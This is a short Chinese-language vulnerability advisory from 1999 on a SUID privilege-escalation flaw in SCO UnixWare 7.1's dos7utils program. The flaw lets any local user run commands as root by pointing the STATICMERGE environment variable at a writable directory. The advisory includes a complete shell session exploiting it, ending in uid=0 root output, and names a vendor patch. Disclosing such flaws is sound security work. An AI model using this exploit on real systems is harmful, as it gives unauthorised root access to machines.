SCO Unixware的dos7utils漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 SCO UnixWare 7.1详细描述 在/usr/lib/merge/dos7utils程序(默认状态下是SUID程 序)中存在一个漏洞允许 任何用户以ROOT身份执行任何命令。Dos7utils程序从环境 变量STATICMERGE中 获得localeset.sh exec的路径。我们通过设置一个可写目 录并设置-f开关参数, 可以使用dos7utils用以下方法执行程序: bash-2.02$ uname -a; id; pwd UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5 uid=101(xnec) gid=1(other) /usr/lib/merge bash-2.02$ export STATICMERGE=/tmp bash-2.02$ cat > /tmp/localeset.sh #!/bin/sh id bash-2.02$ chmod 700 /tmp/localeset.sh bash-2.02$ ./dos7utils -f bah uid=0(root) gid=1(other) groups=0(root),1(other),2(bin),3(sys),4 (adm),5(uucp),6(mail), 7(tty),8(audit),10(nuucp),12(daemon),23(cron),25 (dtadmin),47(priv),9(lp) bash-2.02$ 测试代码 见描述部分。 解决方案 从SCO网站下在sse037.tar.Z补丁 。 相关信息 |
